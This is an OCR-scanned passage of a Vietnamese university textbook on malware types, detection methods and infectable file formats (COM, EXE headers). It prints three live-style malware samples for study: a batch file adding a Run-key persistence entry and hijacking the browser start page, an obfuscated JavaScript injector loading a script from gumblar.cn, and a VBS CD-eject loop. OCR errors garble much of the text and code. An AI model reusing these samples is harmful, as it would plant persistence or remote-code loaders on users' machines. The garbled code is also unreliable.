thể chia làm 2 loại: 

Network Service Worm lan truyền bang cách lợi dụng các lỗ hồng bảo 
mật của mạng, của hệ điều hành hoặc của ứng dụng. Sasser là ví dụ cho 
loại sâu này. 

Mass Mailing Worm là một dang tan công qua dich vụ mail, tuy nhiên 
nó tự đóng gói dé tấn công va lây nhiễm chứ không bám vao vật chủ là 
email. Khi sâu này lây nhiễm vào hệ thống, nó thường cố gắng tìm kiếm 
số địa chỉ và tự gửi bản thân nó đến các địa chỉ thu nhặt được. Việc gửi 
đồng thời cho toàn bộ các địa chỉ thường gây quá tải cho mạng hoặc cho 
máy chủ mail. Netsky, Mydoom là vi dụ cho thé loại này. 
1.2.2.3 Trojan Horse 

La loại ma độc hại được dat theo sự tích “Ngựa thành Troy”. Trojan 
horse không tự nhân bản tuy nhiên nó lây vào hệ thống với biểu hiện rất 
ôn hoà nhưng thực chất bên trong có án chữa các đoạn mã với mục đích 
gây hại. Trojan có thé lựa chọn một trong 3 phương thức dé gây hại: 

Tiếp tục thực thi các chức năng của chương trình mà nó bám vào, bên 
cạnh đó thực thi các hoạt động gây hại một cách riêng biệt (ví dụ như gửi 
một trò chơi dụ cho người dùng sử dụng, bên cạnh đó là một chương 
trình đánh cắp password) 

Tiếp tục thực thi các chức năng của chương trình mà nó bám vào, 
nhung sửa đôi một số chức năng dé gây tôn hại (vi dụ như một trojan giả 
lập một cửa số login dé lay password) hoặc che dấu các hành động pha 
hoại khac (ví dụ như trojan che dấu cho các tiến trình độc hại khác bằng 


cách tắt các hiển thị của hệ thong) 
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Thực thi luôn một chương trình gây hai bằng cach núp dưới danh một 
chương trình không có hại (ví dụ như một trojan được giới thiệu như là 
một chò chơi hoặc một tool trên mạng, người dùng chỉ cần kích hoạt file 
nảy là lập tức dữ liệu trên PC sẽ bị xoá hết) 

1.2.2.4 Malicious Mobile Code 

Là một dạng mã phần mèm có thé được gửi từ xa vào dé chạy trên một 
hệ thống mà không cần đến lời gọi thực hiện của người dùng hệ thống đó. 
Malicious Mobile Code được coi là khác với virus, worm ở đặc tinh là 
nó không nhiễm vào file và không tìm cách tự phát tán. Thay vì khai 
thác một điểm yếu bảo mật xác định nao đó, kiểu tan công này thường 
tác động đến hệ thông bang cách tận dung các quyên ưu tiên ngầm định 
để chạy mã từ xa. Các công cụ lập trình như Java, ActiveX, JavaScript, 
VBScript là môi trường tốt cho Malicious mobile code. Một trong những 
ví dụ nói tiếng của kiểu tán công nay là Nimda, sử dung JavaScript. 

Kiểu tấn công nay của Nimda thường được biết đến như một tấn công 
hỗn hợp (Blended Atatck). Cuộc tan công có thé đi tới bằng một email 
khi người dùng mở một email độc bằng web-browser. Sau khi nhiễm vào 
máy nay, Nimda sẽ có gắng sử dụng số địa chỉ email của máy đó dé phát 
tán tới các máy khác. Mặt khác, từ máy đã bị nhiễm, Nimda cố găng quét 
các máy khác trong mạng có thư mục chia sẻ mà không bao mật, Nimda 
sẽ dùng dịch vu NetBIOS như phương tiện dé chuyên file nhiễm virus 
tới các máy đó. Đồng thời Nimda cô gắng dò quét để phát hiện ra các 
máy tính có cai dich vu IIS có điểm yếu bảo mật của Microsoft. Khi tìm 
thấy, nó sẽ copy bản thân nó vào server. Nếu một web client có điểm yếu 
bảo mật tương ứng kết nối vào trang web này, client đó cũng bị nhiễm 
(lưu ý rằng bị nhiễm mà không cần “mở email bị nhiễm virus”). Quá 
trình nhiễm virus sẽ lan tràn theo cấp số nhân. 
1.2.2.5 Tracking Cookie 

Là một dạng lam dung cookie dé theo dõi một số hành động 
duyệt web của người sử dụng một cách bất hợp pháp. Cookie là một 
file dữ liệu chứa thông tin về việc sử dụng một trang web cụ thé nào đó 
của web-client. Mục tiêu của việc duy trì các cookie trong hệ thông 
máy tính nhằm căn cứ vào đó dé tạo ra giao diện, hành vi của trang web 
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sao cho thích hợp va tương ứng với từng web-client. Tuy nhiên tinh 

năng này lại bị lạm dụng để tạo thành các phần mềm gián điệp 

(spyware) nhằm thu thập thông tin riêng tư về hành vi duyệt web của cá 

nhân. 
1.2.2.6 Phan mém gián điệp (Spyware) 

Là loại phần mềm chuyên thu thập các thông tin từ các máy chủ (thông 
thường vì mục đích thương mại) qua mạng Internet mà không có sự nhận 
biết và cho phép của chủ máy. Một cách điển hình, spyware được cài đặt 
một cách bí mật như là một bộ phận kém theo của các phần mềm miễn 
phi (freeware) và phần mềm chia sẻ (shareware) mà người ta có thé tải 
về từ Internet. Một khi đã cài đặt, spyware diéu phối các hoạt động của 
máy chủ trên Internet và lặng lẽ chuyển các đữ liệu thông tin đến một 
máy khác (thường là của những hãng chuyên bán quảng cáo hoặc của 
các tin tặc). Phần mềm gián điệp cũng thu thập tin tức về địa chỉ thư điện 
tử và ngay cả mật khẩu cũng như là số thẻ tín dụng. 

Khác với worm và virus, Spyware không có khả năng tự nhân bản. 
1.2.2.7 Phan mém quảng cáo (Adware) 

Phần mềm quảng cáo, rất hay có ở trong các chương trình cài đặt tải từ 
trên mạng. Một só phan mềm vô hại, nhưng một số có khả năng hiển thị 
thông tin lên màn hình, cưỡng chế người sử dụng. 
1.2.2.8 Attacker Tool 
La những bộ công cu tan công có thé sử dung dé đây các phần mềm độc 
hại vào trong hệ thống. Các bộ công cụ này có khả năng giúp cho kẻ tấn 
công có thé truy nhập bat hợp pháp vào hệ thống hoặc làm cho hệ thống 
bị lây nhiễm mã độc hại. Khi được tải vào trong hệ thống bằng các đoạn 
mã độc hai, Attacker tool có thể chính là một phần của đoạn mã độc đó 
(vi dụ như trong một trojan) hoặc nó sẽ được tải vào hệ thống sau khi 
nhiễm. Ví dụ như một hệ thống đã bị nhiễm một loại worm, worm này 
có thé điều khiến hệ thống tự động kết nối đến một web-site nao đó, tải 
attacker tool từ site đó và cài đặt Attacker tool vào hệ thống. Attacker 
tool thường gặp là backdoor và keylogger 

- Backdoor là một thuật ngữ chung chỉ các phần mềm độc hại thường 
trú và đợi lệnh điều khiển từ các công dich vụ TCP hoặc UDP. Một cách 
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đơn giản nhất, phan lớn các backdoor cho phép một kẻ tan công thực thi 
một số hành động trên máy bị nhiễm như truyền file, dò mật khẩu, thực 
hiện mã lệnh... Backdoor cũng có thể được xem xét dưới 2 dạng: 
Zoombie và Remote Administration Tool 

- Zoombie (có thé đôi lúc gọi là bot) là một chương trình được cai đặt 
lên hệ thông nhằm mục đích tan công hệ thống khác. Kiểu thông dung 
nhất của Zoombie là các Agent dùng để tô chức một cuộc tán công 
DDoS. Kẻ tán công có thé cài Zoombie vào một số lượng lớn các máy 
tính rồi ra lênh tan công cùng một lúc. Trinoo và Tribe Flood Network là 
hai Zoombie nói tiếng. 

- Remote Administration Tool là các công cụ có sẵn của hệ thống cho 
phép thực hiện quyền quản trị từ xa. Tuy nhiên hacker cũng có thể lợi 
dụng tính năng này để xâm hại hệ thống. Tan công kiểu này có thé bao 
gồm hành động theo dõi mọi thứ xuất hiện trên màn hình cho đến tác 
động vao cầu hình của hé thống. Ví dụ về công cụ RAT là: Back Orifice, 
SubSeven... 

- Keylogger là phần mềm được dùng dé bí mật ghi lại các phím đã được 
nhân bang bàn phim rồi gửi tới hacker. Keylogger có thé ghi lại nội dung 
của email, của văn ban, user name, password, thông tin bí mật...Ví dụ 
một số loại keylogger như: KeySnatch, Spyster... 

- Rootkits là tập hợp của các file được cài đặt lên hệ thống nhằm biến 
đổi các chức năng chuẩn của hệ thống thành các chức năng tiềm án các 
tan công nguy hiểm. Ví dụ như trong hệ thống Windows, Rootkit có thé 
sửa đôi, thay thế file, hoặc thường trú trong bộ nhớ nhằm thay thế, sửa 
đổi các lời gọi hàm của hệ điều hành. Rootkit thường được dùng để cài 
đặt các công cụ tấn công như cài backdoor, cài keylogger. Ví dụ về 
Rootkit là: LRK5, Knark, Adore, Hack Defender. 

- Web Browser Plug-in là phương thức cai mã độc hai thực thi cùng với 
trình duyệt web. Khi được cài đặt, kiêu mã độc hại này sé theo dõi tat cả 
các hành vi duyệt web của người dùng (ví dụ như tên web site đã truy 
nhập) sau đó gửi thông tin ra ngoài. Một dạng khác là phần mềm gián 


điệp có chức năng quay số điện thoại tự động, nó sẽ tự động kích hoạt 
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modem và kết nối đến một số điện thoại ngầm định mặc dù không được 
phép của chủ nhân. 

- Email Generator là những chương trình cho phép tạo ra và gửi đi một 
só luong lón các email. Mà dóc hai có thé gieo rác các Email generator 
vào trong hé thóng. Các chuong trinh gián diép, spam, mà dóc hai có thé 
được dính kém vào các email được sinh là từ Email generator và gửi tới 
các dia chi có trong số địa chỉ của máy bị nhiễm. 

- Attacker Toolkit là các bộ công cụ có thể được tải xuống va cài vào hệ 
thống khi hệ thống đã bị khống chế bởi phần mềm độc hại. Các công cụ 
kiêu như các bộ dò quét công (port scanner), bộ phá mật khẩu (password 
cracker), bộ dò quét gói tin (Packet Sniffer) chính là các Attacker Toolkit 
thường hay được sử dụng. 
1.2.2.9 Phishing 
La một hình thức tan công thường có thé xem là kết hợp với mã độc hai. 
Phishing là phương thức dụ người dùng kết nối và sử dụng một hệ thong 
máy tinh giả mạo nhằm làm cho người dùng tiết lộ các thông tin bí mật 
về danh tính (ví dụ như mật khẩu, số tài khoản, thông tin cá nhân...). Kẻ 
tan công phishing thường tạo ra trang web hoặc email có hình thức giống 
hệt như các trang web hoặc email mà nạn nhân thường hay sử dụng như 
trang của Ngân hàng, của công ty phát hành thẻ tín dụng... Email hoặc 
trang web giả mao nay sẽ dé nghi nạn nhân thay đổi hoặc cung cáp các 
thông tin bí mật về tài khoản, về mật khẩu... Các thông tin này sẽ được 
sử dụng dé trộm tiền trực tiếp trong tài khoản hoặc được sử dụng vào các 


mục đích bất hợp pháp khác. 
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Opportunities to Block: 
. Initial Web Site Compromise 
- Mass Phishing E-Mail 
- Victim Clicks on Misleading URL 
. Phish Web Site is Displayed 
- Victim Submits Account Information 


Compromises a host 
and installs a phish Web site 
and mass-mailer 


Sends out phishing e-mail 


Victim clicks a phish URL mp 


Phish VVeb site is viewed 


= 
p 


Victim Users 


Victim Web Server Victim submits eegen 


Hình 1-8 Mô tả về Phishing 

1.2.2.10 Virus Hoax 

La các cảnh báo giả về virus. Các cảnh bảo giả này thường núp dưới 
dạng một yêu cầu khẩn cấp để bảo vệ hệ thống. Mục tiêu của cảnh báo 
virus giả là có gang lôi kéo mọi người gửi cảnh báo cảng nhiều cảng tốt 
qua email. Bản thân cảnh báo giả là không gây nguy hiểm trực tiếp 
nhưng những thư gửi để cảnh báo có thể chữa mã độc hại hoặc trong 
cảnh báo giả có chứa các chỉ dẫn vẻ thiết lập lại hệ điều hành, xoá file 
làm nguy hại tới hệ thông. Kiểu cảnh báo giả này cũng gây tốn thời gian 
và quấy roi bộ phận hỗ trợ kỹ thuật khi có quá nhiều người gọi đến và 
yêu cầu dịch vụ. 
1.3 Các phương pháp phát hiện mã độc 

Mã độc có rất nhiều hình thái khác nhau và dé phát hiện được mã độc 
tồn tại trong máy tính, trong hệ thống mạng là việc không dễ dàng. Đối 
với người dùng thông thường họ thường chỉ nhận biết khả năng máy tính 
bị nhiễm mã độc thông qua một số dấu hiệu như : 
- Khóa, không cho chạy các chương trình hệ thống (cmd, regedit, tasl 
manager, gpedit, run,..) 

- Khi chạy một chương trình thường thông báo lỗi, chạy các file *.exe, 
* com,... đều bị thay thế bởi các chương trình khác. 

- Máy tính chạy chậm bất thường, chậm kết nối mạng. 
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- Nhận thay có vẻ như có tiến trình nào đó đang chạy tốn nhiều tài 
nguyên hệ thống, tốn RAM, CPU nhưng chưa tìm ra. 

- An file, thư muc , tao các thư mục lạ, các biểu tượng lạ. 

- Thay đôi dia chi IP không vào được mạng 

- Ngoài ra có nhiều dấu hiệu khác cho thấy máy tính có thể bị nhiễm 
mã độc. Tuy nhiên đôi khi các dấu hiệu này là kết quả xung đột giữa các 
phần mềm chạy trên máy tính, hoặc giữa phần cứng và phần mềm không 
tương thích. 

Bên cạnh đó, người dùng khó có thé tìm được vị trí chính xác mã độc 
nằm ở đâu trong máy tính, trong hệ thống mạng. 

Dé có thé xác định được vị trí và phát hiện thực sự mã độc nằm ở đâu 
thì người dùng có thể sử dụng một số phần mềm phát hiện và phòng 
chống mã độc. Các nhà khoa học đã tốn nhiều công sức nghiên cứu, xây 
dựng các hệ thống phòng chống virus máy tính theo nhiều hướng tiếp 
cận, kỹ thuật khác nhau .Cho đến nay, có ba kỹ thuật nhận dạng virus 
máy tính đã được áp dụng: dựa vào chuỗi nhận dạng virus (signature- 
based approach), dựa vào hành vi nghi ngờ virus (suspicious 
behavior-based approach) và dua vào ý dinh virus (intention-based 
approach). 

Phương pháp phát hiện dựa vào chuỗi nhận dạng 

Hoạt động theo nguyên lý nhận dạng mẫu, các AV sửdụng một CSDL, 
chứa mẫu virus (ID-virus library). Mỗi khi có virus mới, các chuyên gia 
anti-virus sẽ giải mã, trích chọn và cập nhật chuỗi nhận dạng virus vào 
thư viện. Thông tin về đối tượng chân đoán (ghi nhận từ hệ thống đích) 
cùng với thông tin của virus (trong thư viện mẫu) sẽ cho kết luận về tình 
trạng của đối tượng. 

Nhận dạng mẫu giúp AV phát hiện các virus đã biết trên tập dữliệu 
chân đoán với độ chính xác cao. Tuy nhiên phương pháp này có khá 
nhiều nhược điểm: 

- Công kênh: Kích thước thuvién mẫu tỷlệthuận với sóvirus dà cập nhật 


và tylé nghịch với tóc độtm kiêm. 
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- Bi động: AV chi hiệu quả trên các mẫu virus đã cập nhật, không dap 
ứng kịp thời dịch bệnh do tốn thời gian cho việc thu thập mẫu virus mới, 
giải mã, phân tích, lập thuật giải, cập nhật phiên bản mới, phát hành... 

- Nhằm làn: Các hacker có gắng tạo vỏ boc an toàn cho virus. Khi AV 
so mẫu chân đoán giống với virus, dữ liệu sạch của hệ thống sé bị tây 
(clean) nhằm. 

Phương pháp phát hiện dựa trên hành vi khác với việc phát hiện dựa 
vào bé ngoài, cáu trüc tép tin có san là nó xác dinh các hành dóng thuc 
hiện của mã độc hon là việc xá định cau trúc nhị phán của chương trinh. 
Các chương trình không giống với cú pháp hay cau trúc nhung có hành 
vi giống với những hành vi đã xác định trước là đã xác định được nó là 
mã độc hay không. 

Cơ chế này giúp cho việc xác định mã độc một cách hiệu quả đối với 
các loại mã độc không ngừng tạo ra các bién đổi mã lệnh của nó. Phuong 
pháp phát hiện hành vi luôn theo dõi các biến đổi về tài nguyên hệ thống 
và các dịch vụ mà các mã độc khi sử dụng sẽ ngay lập tức bị theo dõi va 
quan sát hành vi. 

Một chương trình phát hiện hành vi gồm các thành phan sau: 

Thu thập dữ liệu: Thành phần này thu thập các thông tin động và tĩnh 
được ghi lại. 

Chuyén đổi: Thanh phan nay sẽ chuyền các thông thu thập được bởi mô 
dun thu thập dir liệu vào nơi trung gian dé lưu vào cơ sở dữ liệu. 

Thuật toán so sánh: Được sử dụng dé so sánh các phần đại điện với chữ 
ký hành vi. 
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Thu thập dữ liệu 


Chuyển đôi 
Thuật toán 


Trung gian 


Cơ sở đữ 
liệu hành vị 


Hình 1-9 M6 hình chương trình quét hành vi 


Phát hiện virus dựa vào ý định 

Do hãng Sandrasoft (An D6) đề xướng từ năm 2005, tiếp cận intention- 
based (tên mã Rudra) [90] lưu giữ hình ảnh chi tiết của máy tính trong 
tình trạng sạch, sau đó tiếp tục theo dõi trạng thái hệ thống. Những thay 
đổi quan trọng trong tập tin, cau hình hệ thống hay HDH đều được cảnh 
báo như một mối hiểm họa tiềm tàng. 

Khi những thay đổi này được đánh giá nguy hiểm, hệ thống sẽ khôi 
phục máy về tìnhtrạng ban đầu. Mặc dù đơn giản nhưng tiếp cận nay tỏ 
ra khá hiệu quảvì nó có thể bảo vệmáy tính khỏi các mối đe dọa chưa 
được biết đến, kế cà virus máy tính. 

Trong thực tế, tiếp cận “quay vềquá khứ” đã được nhiều hãng phan 
mềm hệ thống sửdụng: Symantec [89] có Norton Ghost va Norton 
Goback; VMware [94] có System Image Snapshot; Faronics [74] có 
Deep Freeze... Ban thân Windows XP cũng có chức năng phục hồi hé 
thống bằng System Restore. Tuy nhiên tiếp cận này kém hiệu quả khi 
các điểm trạng thái được ghi nhận lúc hệ thông bị nhiễm virus lạ. 

Mặt khác, hệ thống cũng cần bộ nhớ ngoài đủ lớn dé lưu toàn bộ hình 
ảnh hệ thống qua từng thời điểm [39]. 
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1.4 Các phương pháp phòng chống mã độc 
Hiện giờ việc phòng và chống mã độc là yêu cầu chung của người sử 
dụng máy tính và hệ thống mạng. Hiện tại người dùng thường sử dụng 
các phần mềm diệt mã độc, tuy nhiên hiện giờ mã độc xuất hiện theo 
từng giờ, từng ngày vì thế hầu hết các chương trình diệt mã độc không 
cập nhật kịp các mẫu phù hợp. Vì vậy bên cạnh giải pháp là sử dụng 
phần mềm diệt mã độc đúng cách thì người dùng cần phải có những 
chính sách sử dụng máy tính phù hợp như sau: 
- Sử dụng phần mềm diệt mã độc, cập nhật thường xuyên. 
- Quét virus định kỳ. 
- Luôn quét các USB, 6 cứng gắn ngoài khi cắm vào máy tính. 
- Duyệt web an toàn, thiết lập bảo mật cho trình duyệt, tránh click 
những link quảng cáo hoặc bất thường. 
- Quét các file tải về từ Internet 
- Không kích vào link hay tệp đính kèm trong email khi chưa chắc chan 
về độ an toàn của chúng. 
- Tải và cài đặt phần mềm từ các website tin cậy. 
- Sử dụng Sandbox, máy ảo, các trang kiểm tra trực tuyến dé kiểm thử 
chương trình nếu không chắc chắn về tính an toàn của nó. 
- Vận dụng kinh nghiệm sử dụng máy tính 
+ Phát hiện sự hoạt động khác thường của máy tính 
+ Kiểm soát các ứng dụng đang hoạt động 
+ Loại bỏ một số tính năng của HĐH có thé tạo điều kiện lây 
nhiễm cho virus 
- Cập nhật các bản vá lỗi hệ điều hành 
- Bảo vệ dữ liệu máy tính 
+ Sao lưu dữ liệu theo chu kỳ 


+ Tao các dit liệu phục hói cho toàn hệ thống 
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Cau hoi 6n tap. 
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Chuong 2 
CO CHE HOAT DONG CUA MA DOC 

Nghiên cứu mã độc trên máy tính luôn gắn với việc phân tích các định 
dạng dữ liệu vật chủ. Mỗi loại mã độc chỉ lây vào một số định dạng dữ 
liệu nhất định. Phân tích các định dạng dữ liệu mà mã độc hay sử dụng 
làm mô trường lây lan, cư trú là cơ sở để phân loại dữ, giảm thiểu quá 
trình phát hiện (loại bớt các đối tượng chắc chắn sạch khỏi chân đoán) và 
gia tăng độ tin cậy của hệ thống (giảm nguy cơ bỏ sót đối tượng chan 
đoán). Các định dạng vật chủ chứa mã thi hành có thê nhiễm mã độc 
gồm: tập tin văn bản, tập tin chương trình, tập tin MS Office và mau tin 
khởi động 

[St|  Vậtchủ  |Loạiviusl _ Các dinh dang | Kiu  — 
Tập tin văn bản Worm : : 


Tap tin siéu van ban HTT, HTA 


File virus | Tập tin lệnh 
Tập tin chương trình Worm Tập tin thi hành EXE, SCR 
Trojan DLL, CPL, SYS, VXD 


Tập tin tu liệu DOC, DOT 
Tap tin MS Office Tap tin bang tinh XLS, XLT 
Tập tin trình diễn PPT, POT 


Mẫu tin khởi động hệ 
điều hành đĩa mềm xì 


et ee : Mẫu tin khởi động hệ 
Mẫu tin khởi động Boot virus điều hành đĩa cứng #N/A 
Mẫu tin khởi tạo phân 


Hinh 2-1: Các định dang vật chủ chứa mã thực thi có thé bị nhiễm virus 


2.1 Các định dạng dữ liệu nhiễm mã độc 

2.1.1 Định dạng tập tin văn bản 

Tập văn bản (text file) là tổ chức file đơn giản, được chia làm hai loại: 

- Tập văn bản 7 bit: chứa các ký tự ASCII chuẩn (7 bit) có thé gõ trực 
tiếp từ bàn phím, mã từ 32 (khoảng trắng) đến 126 (ký tự~). Tập văn bản 
7 bit dùng chứa nội dung chương trình nguồn như PAS, ASM, C, CPP, 
JS, VBS... 

- Tap văn bản 8 bit: có thêm các ký tự ASCII mở rộng 8 bit (từ 128 đến 
255) 
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sử dung ký tự graphic trang trí bảng, hình hộp hoặc thiết lập font chữ 
riêng. Do hiện nay các trình biên dịch/thông dịch lệnh chỉ hỗ trợ các ký 
tự 7 bit nên chưa phát hiện câu lệnh virus trong các tập tin văn ban 8 bit. 
Dé thực thi các câu lệnh trong tập tin văn ban 7 bit, hệ thống phải dịch 
chúng sang mã máy. Do không phải hệ thống nào cũng có đủ bộ dịch 
lệnh của tất cả các ngôn ngữ lập trình, nên chi vai loại tập tin van bản 7 
bit là có nguy cơ nhiễm virus (Bang P2.2), đó là các tập tin chứa tập lệnh 


của các ngôn ngữ lập trình được tích hợp san trong hệ thống (Hình P2.1). 


Gen | wen [keu] mg | 
EX Tập lệnh theo lô Batch command Internal Command Interpreter 
EX Tập lệnh siêu van bán | Hyper Text HTML Application Host 


| 3 | Táp lénh khói tao System Initiation | INI | Windows Startup 

| 4 | Tập lệnh Java Java Script Windows Based Script Host 

E Tap dáng ky hé thóng | System registry | REG | Registry Editor 

| 6 | Tập lệnh Visual Basic | Visual Basic Script | VBS | Windows Based Script Host 
Hinh 2-2 : Các loai tap tin van ban 

Dau hiéu nhan dang các tap van bàn 7-bit có thé nhiém virus là: 

- Dữ liệu byte (32-127) 


- Chứa các từ khóa của các ngón ngữ lập trinh tích hợp sẵn trong hệ 


thống 
(Java Script, VB Script, HTML Application, Command Interpreter...). 


Tap lệnh dành cho lõi 
biên dịch, thông dịch 
sẵn có của hệ thống 


Chương trình nguồn 


Tập lệnh của các ngôn 
ngữ lập trình khác 


Văn bản 7-bits 


Văn bản 7-bits khác 


Tập văn bản 
Van bản 8-bits 


Dưới đây là một dạng malware nằm trong file bat. 
Nội dung như sau: 
@ECHO OFF 
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REG ADD _ HKCU\Software\Microsofi\InternetExplorer\Main /v StartPage /t REG_SZ 
/dhttp://pcgyaan.wordpress.com /f 

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG SZ 
/d %windir%\force.exe /f 

copy /y Wallpaper1.bmp ”%USERPROFILE%\Local Settings\Application Data\Microsoft” 
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters 

RUNDLL32.exe USER32.DLL,SwapMouseButton 

rename song.exe force.exe 

move /y force.exe “Y%windir%” 

del /Q force.bat 

del /Q wallpaper.bmp 


Mau mã độc trong định dang Java js 
<script language=javascript><!-- 
(function(){var xXX='%';var 


Zjwrl-' 76 61r 20 61 3d 22 53criptE 6eg 69ne 22 2cb 3d 22V 65r 73io 6e()+_22_2cj 3d 22 


22. 2cu 3d 6eav. 69 67a 74or 2e 75 73er 41g 65nt 3bif( 28u 2e 69ndexOf 28 22W  69n 22) 3 


e0) 26 26 28 75 2ein 64exOf( 22N 54. 20. 36 22). 3c0 29 26 26(do 63ument 2ecook 69 65 2 


ei 6ed 65xOf( 22 6die 6b 3d 31 22 29 3cO 29 26 26(t 79p 65of(z 72 76 7at 73) 21 3dt 79p 


eof( 22A 22))) "bar 76zts 3d 22A 22 3b 65v GI 22if(wi Gedow 2e 22-*a- 22) 6a 3dj* 22*a 


+_22 4d 61jo 72 22 2bb 2ba- 22Minor 22*b-«a- 22 42 75ild 22*b-« 22 6a 3b 22) 3bd 6fcu 


ment 2e 77r 69te 28 22 3cscript 20sr 63 3d 2f 2fgumblar 2e 63n 2f 72 73s 2f 3fi 64 3d 22 


*j 2b 22 3e 3c 5c 2fscript 3e 22 29 3b 7d'var 


xtS-ZjWrl.replace(/ /g,xXXx);eval(unescape(xtS))))(); 


--></script> 


Mẫu mã độc trong định dang VBS 


Set oWMP =  CreateObject("WMPlayerOCX.7") Set colCDROMs = 
oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to 
colCDROMs.Count - 1  colCDROMs.Item(i).Eject Next For i = 0 to 


colICDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 100 
loop 


4] 


2.1.2 Dinh dang trong tép tin chuong trinh 

Các tập tin chương trình (program file), còn gọi là ứng dung 
(application) hay phần mềm (software), được biên dich thành các tó chức 
file thực thi trong môi trường của hệ điều hành. Đối với DOS/Windows, 
ngoài hai loại tập tin chương trình chính là COM và EXE còn có các tổ 
chức thực thi khác như SYS, DLL, CPL, SCR, OCX... Trong quá trình 
phát triển, Microsoft đã sử dụng nhiều định dạng thực thi phức tạp. Khi 
nạp vào bộ nhớ, tập tin chương trình sẽ được hệ điều hành thực thị, 
không quan tâm nguồn gốc và mức độ nguy hiểm của các lệnh này. Do 
vậy, các tập tin chương trình là một trong những ké hở bao mật quan 


trọng của hệ thống. 


ERC 
DLL 


PE-EXE 
E? ——— Windows 32 bit 


LEEXE | VXD 


Executable 


Program Files 


Hinh 2-4 : Phan loai các tép tin chuong trinh 
42 


Phân tích định dang tập tin là hoạt động kha pho biến trong nhiều lĩnh 
Vực phần mềm (đồ họa, âm thanh, liên lạc, bảo mật, hệ thống. - vón ti 
mi, tốn nhiều toi gian va công sức. Có rất nhiều tài liệu nói về các loại 
định dang tập tin, nên trong phan nay giáo trình này không đi sâu phan 
tích kỹ thuật mà tập trung vào công tác phân loại 

Sinh viên có thể tham khảo thêm các định dạng tệp tin tại địa chỉ 
http://www.wotsit.org. 

2.1.2.1 Dinh dang COM (DOS Command) 

COM là định dang thi hành đơn giản trong mô hình phân đoạn 
segment:offset của MSDOS. Các tập tin COM chứa hình ảnh dữ liệu của 
đoạn bộ nhớ lúc file được nạp vào địa chỉ Segment:100h. Do hoạt động 
trong một phân đoạn nên kích thước file COM giới hạn trong phạm vi 
64KB. Khi lây vào file COM, virus sẽ thay điểm vào lệnh đầu tiên bằng 
lệnh gọi (mã máy E8h) hoặc lệnh nhảy (EBh nhảy gần dưới 128 byte, 
E9h nhảy xa trên 128 byte) đến thủ tục xử ly của virus (Hình ). Đặc 
điểm nhận dạng các tập COM có thể nhiễm virus như sau: 

- Kích thước dưới 64KB 

- Dữ liệu byte trải dài trên bộ ma ASCII (0-255) 

- Có lệnh nhảy (E9h, EBh) hoặc lệnh gọi (E8h) đầu file. 
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a. Biểu diễn byte | E9 | E6 | 02 | 1B | 5B | 50 | 32 | 4A | OD | 20 | 20 | 4E_ 


E9: Mã lệnh nhảy (xa hon 128 byte) đến thủ tục khởi tạo 


b. Biểu diễn lệnh máy 
:0100 E9E602 03E9 II E9: Nhảy đến thủ tục khởi tạo 
:0103 1B5B50 BX,[BP+DI+50] 
:0106 324A0D CL,[BP+SI+0D] 
:0109 2020 [BX+SI],AH 
:010B 4E SI 


:03E9 50 AX H Thủ tục khói tạo 
:03EA 53 BX 

:03EB B93E00 CX,003E 

:03EE BA0901 DX,0109 

:03F1 E8F8FE 02EC II E8: mã máy lệnh Call 


Hình 2-5: Mô tà dit liệu một tập tin COM tiêu biểu 

a. Biểu dién vector dit liệu byte của tap tin COM 

b. Biểu diễn lệnh máy của 12 byte đầu và các lệnh trong thủ tục khởi 
tạo 

Trong thời kỳ đầu của DOS, do đơn giản và nhỏ gọn nên định dạng 
COM rat dé bi file virus tan công. Do hạn chế về kích thước và khả năng 
truy nhập bộ nhớ nên các hacker đã chuyển hướng tan công sang dinh 
dạng EXE (Executable File) 
2.1.2.2 Dinh dang EXE (DOS Executable) 
Dinh dang EXE cho phép mở rộng kích thước tap tin lớn hon 64KB 
bang cách sử dụng mỗi phân đoạn bộ nhớ riêng biệt cho từng thanh ghi 
CS, DS, ES, SS. Với cách tô chức này, EXE sử dụng cấu trúc đầu file 
(gọi là EXE header) chứa thông tin của file và các tham số giúp hệ điều 
hành định vị bộ nhớ, tải mã lệnh, đữ liệu, ngăn xếp và khởi tạo giá trị các 
thanh ghi CPU trước khi thực thi chương trình. 
Lây vào EXE, file virus ghép mã lệnh vào cuối file rồi điều chỉnh CS:IP 
trỏ đến địa chỉ của nó. Các tập EXE có đặc điểm nhận dạng như sau: 
- Word dau tập tin có tri‘MZ’ hoặc ‘ZM’ 
- Dữ liệu byte, trải dài trên toàn bang mã ASCII (0-255) 
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- Thủ tục khởi tạo trỏ đến dia chi thực trên file (Header < CS:IP < 
Filesize) 

Hinh x mô tả cấu trúc đầu file của một tập tin EXE tiêu biểu. Hai byte 
đầu tiên (4D-5A) biểu diễn chuỗi ‘MZ’ nhận dạng file EXE. Các trường 
tiếp theo chứa thông tin file và các tham số định vị. Đặc biệt trường 3Ch 
có giá trị 00 (không có bảng thông tin bó sung). Nếu khác 0, trường này 
chứa con trỏ đến một header khác dùng cho NE-EXE (Windows 16 bit) 
và PE-EXE (Windows 32 bit). Các định dạng nay sẽ được mô tả ở phần 
tiếp theo. 

00000: 4D 5A BC 00 08 00 05 00 20 00 71 00 FF FFCC00 //5A4D = MZ: dấu hiệu EXE 
00010: 08 07 00 00 10 00 00 00 1E 00 00 00 01 00 90 08 


00020: 00 00 1E 00 00 00 0A 01 00 00 00 00 A8 00 72 00 
00030: AD 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 IIkhác 0: trỏ đến header bó sung 


Hình 2-6: Cấu trúc dau file của 1 file EXE tiêu biểu 
2.1.2.3. Định dạng NE-EXE 
Khi giới thiệu hệ điều hành Windows 16 bit (Windows 3.xx), Microsoft 
phải thay đôi định dang EXE cho phù hợp với tập lệnh của CPU chay 
trong chế độ bảo vệ hoặc 386 tăng cường... Thông tin bó sung cho file 
NE-EXE được lưu trữ trong một cau trúc đầu file mới (gọi là NE header), 
định vị qua trường 3C của cau trúc đầu file DOS-EXE cũ. Header bó 
sung này được bat đầu bằng hai byte 4E-45 (chuỗi ‘NE’). Các trường 
tiếp theo chứa thông tin file NE-EXE (ví dụ file thực thi EXE thực, hay 
là các thư viện liên kết động DLL...) và các tham số định vị dành cho hệ 
thống trong các điều kiện thực thi khác nhau. 
Hình mô tả cấu trúc đầu file của tập tin thi hành trong môi trường 
Windows 16 bit. Cấu trúc nay gồm hai phan. Phần đầu là cấu trúc đầu 
